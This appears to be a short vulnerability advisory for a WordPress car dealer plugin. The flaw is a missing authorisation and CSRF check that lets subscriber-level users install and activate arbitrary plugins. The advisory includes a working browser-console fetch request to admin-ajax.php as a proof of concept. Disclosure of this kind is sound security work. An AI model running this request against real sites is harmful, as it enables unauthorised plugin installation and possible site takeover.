The plugin does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org
Run the below command in the developer console of the web browser while being on the blog as a subscriber user to install and activate the classic-editor plugin fetch('/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=cardealer_install_plugin&slug=classic-editor', redirect: 'follow' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
Lana Codes
Lana Codes
Yes
2022-11-21 (about 10 months ago)
2022-11-21 (about 10 months ago)
2022-11-21 (about 10 months ago)